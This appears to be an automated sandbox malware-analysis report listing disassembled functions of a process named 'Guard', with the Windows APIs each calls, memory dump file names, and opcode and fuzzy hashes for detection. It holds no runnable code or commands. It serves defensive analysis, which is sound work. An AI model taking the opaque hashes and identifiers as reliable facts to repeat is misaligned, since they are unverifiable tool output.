                                                                                                                                                                                                                    Function 00370E38 Relevance: 1.6, APIs: 1, Instructions: 94processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00370EE7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3332741929-0
                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                    • Instruction ID: 792485ec6b13ec40d687d05323a05d40fb6ceea2f912bbabfa4199685a94bd8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9331B371A00509DBD72ADF58C480969F7A6FF59300B65CAA9E409CBB51E735EDC1CBC0
                                                                                                                                                                                                                    Function 0038E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    • Opcode ID: 467b64c359aebe09832ebdbd9ff32f1e195a1806efa6457298060f656f63548a
                                                                                                                                                                                                                    • Instruction ID: ea4681feebf842dc67d52baf55d47f549f04089efaa34b475bdaad5f64135dc6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 467b64c359aebe09832ebdbd9ff32f1e195a1806efa6457298060f656f63548a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664118B45083518FDB26DF14C494F1ABBE1BF45314F0989ACE8898B362C371EC89CB52
                                                                                                                                                                                                                    Function 003649C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00364B29: FreeLibrary.KERNEL32(00000000,?), ref: 00364B63
                                                                                                                                                                                                                      • Part of subcall function 0037547B: __wfsopen.LIBCMT ref: 00375486
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003627AF,?,00000001), ref: 003649F4
                                                                                                                                                                                                                      • Part of subcall function 00364ADE: FreeLibrary.KERNEL32(00000000), ref: 00364B18
                                                                                                                                                                                                                      • Part of subcall function 003648B0: _memmove.LIBCMT ref: 003648FA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1396898556-0
                                                                                                                                                                                                                    • Opcode ID: c3e3ea86e989f60b34335ffc1b6c438116ad4e8b22147d0416e18d7366aa2b4b
                                                                                                                                                                                                                    • Instruction ID: 572d34af52a2cd6e2ea20f49273abbbef40c53fd3a00e5e91d80855b82b80719
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3e3ea86e989f60b34335ffc1b6c438116ad4e8b22147d0416e18d7366aa2b4b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B611C432A50205BBCB16FBA0CC06FAE77A9DF40701F10C42DF541AA195EB759A10A798
                                                                                                                                                                                                                    Function 0038E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    • Opcode ID: 5ad28e36206ef590a80511e282a550ed14cadd45bf1dd52e65879f713ba77f68
                                                                                                                                                                                                                    • Instruction ID: e6142dd8cef05ba1336c0e40c210b1b389aa40160043c8c687edb6ddbd87d7d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ad28e36206ef590a80511e282a550ed14cadd45bf1dd52e65879f713ba77f68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21210FB4508341DFDB26DF14C455E1ABBE4BF84305F06896CF88A5B762C731E849CBA2
                                                                                                                                                                                                                    Function 00364220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00363CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00364276
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 6f8cf5ad3c70a35a1830ac7521e65e0c1cc1c250766a4cc0c09816f40de81680
                                                                                                                                                                                                                    • Instruction ID: 5e5bc8c500743a8af90afaffd129dbc32acbb317018f1b8242bcd2692214598b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f8cf5ad3c70a35a1830ac7521e65e0c1cc1c250766a4cc0c09816f40de81680
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19113A316007019FD332CF55C490B62B7F9EF88710F20C92DE8AA8AA54D7B0E845CB60
                                                                                                                                                                                                                    Function 0036408F Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                                                                                    • Opcode ID: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                                                                                                                                                                    • Instruction ID: 43bf68c1f2e30450dddf05c7cda607be8f2dc5cd776de5ab9fbf00ce8c5cc5bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D201A2B5600502AFC316DB29C441D2AF7A9FF8A3507148159F859CBB02DB30EC21CBE0
                                                                                                                                                                                                                    Function 003C495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 003C4998
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1431749950-0
                                                                                                                                                                                                                    • Opcode ID: 3e5ae70303a898aad2de47832a6ef4ba8117b86ce1da3bf60a70b59423646aef
                                                                                                                                                                                                                    • Instruction ID: 18e2079b2c9e74ee9e7ffe68ee1c58aeb0a07c078d0b07c3d12fd961cb6f670a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e5ae70303a898aad2de47832a6ef4ba8117b86ce1da3bf60a70b59423646aef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F03176618144AF8B26EB65D846C9F7BFCEF45320B004059F9099F261EE74AD81C760
                                                                                                                                                                                                                    Function 00364A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _fseek
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2937370855-0
                                                                                                                                                                                                                    • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                                    • Instruction ID: 130bc7a4fc4904d786be51f48ab75d7f3259b2bbcffe2e5ca93a8f1e2c30146b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F08CB6400208BFDF168F84DC00DEB7B7DEB89320F00819CF9045A110D272EA218BA0
                                                                                                                                                                                                                    Function 00364A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,003627AF,?,00000001), ref: 00364A63
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                    • Opcode ID: 25bad922e940bc264fe25d68fda0500018ecd81a8da95aec7a1b5c0c9cdaa59d
                                                                                                                                                                                                                    • Instruction ID: b6ba16e716f1268e0186250438ecf2fda5ada4a07c7f0d0282602fd14b5093ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25bad922e940bc264fe25d68fda0500018ecd81a8da95aec7a1b5c0c9cdaa59d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70F08571940702EFCB3A8FA4E480816BBF5AF04325320CA3EE1DB87A14C3319984CB14
                                                                                                                                                                                                                    Function 00364AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                    • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                                                                                    • Instruction ID: 183a4051b9b05bbf9c605a49b9eacbeba5094ccc7a42b5b05a71de253308885b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0F87290020DFFDF05CF90C941EAABB79FB15314F208589F9198A212D376DA21AB91
                                                                                                                                                                                                                    Function 0036436A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3048848545-0
                                                                                                                                                                                                                    • Opcode ID: 7b4504a13fbedd82b1ed84230b7d88f2d61ece9941b937b4719daae921da4466
                                                                                                                                                                                                                    • Instruction ID: 3aab4d7db2872f8b1f3b17d694a030f338c23fa9cdb943f7911229f178eb9747
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b4504a13fbedd82b1ed84230b7d88f2d61ece9941b937b4719daae921da4466
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8D0C9737522602AA67B313D6D0BD7F856CCBC2AA1B05917EFA0ACE1A6ED584C4241A1
                                                                                                                                                                                                                    Function 003709C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 003709E4
                                                                                                                                                                                                                      • Part of subcall function 00361821: _memmove.LIBCMT ref: 0036185B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2514874351-0
                                                                                                                                                                                                                    • Opcode ID: d8cb6964a77dea17714f81db008818eeae9446fd8be4b2d19327a3c55dd81f93
                                                                                                                                                                                                                    • Instruction ID: 9f0cf34655ce765fefd4e1546daee9c280b0b708723374050cfedc9fa0adfd1f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8cb6964a77dea17714f81db008818eeae9446fd8be4b2d19327a3c55dd81f93
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE0863690022857C722A6989C05FEAB7EDDB89790F0442B6FC08DB344D961AC8186D1
                                                                                                                                                                                                                    Function 003B4D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003B4D31
                                                                                                                                                                                                                      • Part of subcall function 00361821: _memmove.LIBCMT ref: 0036185B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FolderPath_memmove
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3334745507-0
                                                                                                                                                                                                                    • Opcode ID: 38a81d82b0b3c38d0c4cce801347700c5997bed529802fc19d359402471fa132
                                                                                                                                                                                                                    • Instruction ID: 11dedc5e397e344e671fa513b038f61e2573d3be1b2985400d5924ea85c4701a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38a81d82b0b3c38d0c4cce801347700c5997bed529802fc19d359402471fa132
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53D05EA190032C2BDB75E6A59C4DDB77BACD744220F0007A17C5CC3141E9649D858AE0
                                                                                                                                                                                                                    Function 003642AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,003A06E6,00000000,00000000,00000000), ref: 003642BF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387596183.0000000000410000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387647691.0000000000419000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_350000_Guard.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                    • Opcode ID: 076457f7a749ad5bff12c53ab6a948940d3841c08e29bff58bcdab5e8823b8eb
                                                                                                                                                                                                                    • Instruction ID: 1cf48c2464a24d1b2ac33ae7744da751c088f471f352efb1c1c5608e5fe24d7f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 076457f7a749ad5bff12c53ab6a948940d3841c08e29bff58bcdab5e8823b8eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9D0C77464020CBFE715CB80DC46FA9777CE705711F100294FD046A290D6F27D508795
                                                                                                                                                                                                                    Function 003B4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,003B3BFE), ref: 003B4FED
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001E.00000002.3387247442.0000000000351000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387124839.0000000000350000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.00000000003E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000001E.00000002.3387495039.0000000000406000.00000002.00000001.01000000.0000000F.sdmpDownload File
